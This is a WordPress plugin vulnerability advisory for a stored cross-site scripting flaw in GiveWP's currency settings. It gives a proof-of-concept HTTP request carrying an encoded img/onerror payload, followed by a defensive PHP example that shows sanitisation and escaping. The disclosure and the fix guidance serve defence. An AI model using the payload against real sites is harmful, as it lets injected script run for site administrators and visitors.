wpvulndb - Raad Haddad of Cloudyrion GmbH - WPVDB-ID: DAA9B6C1-1EE1-434C-9F88-FD273B7E20BB
History: Jul 11, 2022 - 12:00 a.m.

GiveWP < 2.21.3 - Admin+ Stored Cross-Site Scripting

Published: 2022-07-11 00:00:00
Reporter: Raad Haddad of Cloudyrion GmbH
Source: wpscan.com
Tags: givewp, stored cross-site scripting, currency settings, admin, rest api, security bug

EPSS: 0.001 (percentile 24.8%)

The plugin does not properly sanitise and escape the currency settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in a multisite setup).

PoC

Get a REST nonce (logged in as admin): https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

POST /?rest_route=/give-api/v2/onboarding/settings/currency HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 149
Connection: close
Cookie: [admin+]

_wpnonce=fdde54ee91&value=%22%5c%75%30%30%32%32%5c%75%30%30%33%63%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e%22

The XSS will be triggered when editing/viewing/previewing any Donations forms.
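As an added illustration of the defensive pattern this class of bug calls for (this is example code, not GiveWP's own; the route name, option name and capability check are assumptions of the example and do not come from the advisory): a WordPress REST handler that decodes the submitted value, sanitises it after decoding, and escapes it again at the point of output. The PoC value above is a JSON string carrying \u0022 and \u003c escapes, so a filter applied to the raw parameter before decoding would see neither a quote nor a `<`; the sanitiser has to run on the decoded value, and output escaping has to happen regardless of what was done on save.

```php
<?php
// Added example (not GiveWP code): a REST endpoint for a plain-text currency
// setting that sanitises after JSON decoding and escapes on output.
// Route, option name and the capability used are assumptions of this example.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/settings/currency', [
        'methods'             => 'POST',
        // Only users allowed to manage options may change the setting at all.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => [
            'value' => [
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_string( $value );
                },
            ],
        ],
        'callback'            => 'example_save_currency_setting',
    ] );
} );

/**
 * Store a currency setting submitted as a JSON-encoded string.
 *
 * Decoding runs first so that \u0022 / \u003c escapes become real characters
 * before sanitisation; a filter on the raw parameter would never see them.
 */
function example_save_currency_setting( WP_REST_Request $request ) {
    $raw     = $request->get_param( 'value' );
    $decoded = json_decode( $raw, true );

    if ( ! is_string( $decoded ) ) {
        return new WP_Error( 'invalid_value', 'Expected a JSON string.', [ 'status' => 400 ] );
    }

    // A currency setting is plain text, so tags are stripped outright.
    // For a field that legitimately carries HTML, the usual WordPress pattern is
    // wp_kses_post() for everyone except users holding unfiltered_html; the
    // advisory's point is that the filter must not be skipped when that
    // capability is absent.
    $clean = sanitize_text_field( $decoded );

    update_option( 'example_currency_setting', $clean );

    return rest_ensure_response( [ 'value' => $clean ] );
}

/**
 * Render the stored setting. Escaping belongs at the output point: stored data
 * may predate the sanitiser or have arrived through another code path.
 */
function example_render_currency_setting() {
    $value = get_option( 'example_currency_setting', '' );

    // Attribute context: esc_attr(). In a text node use esc_html() instead.
    printf(
        '<input type="text" name="currency" value="%s">',
        esc_attr( $value )
    );
}
```

With this handler the decoded PoC string loses its `<img ...>` tag in `sanitize_text_field()`, and the remaining quotes are rendered as `&quot;` by `esc_attr()`, so nothing executes when the form is edited, viewed or previewed.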

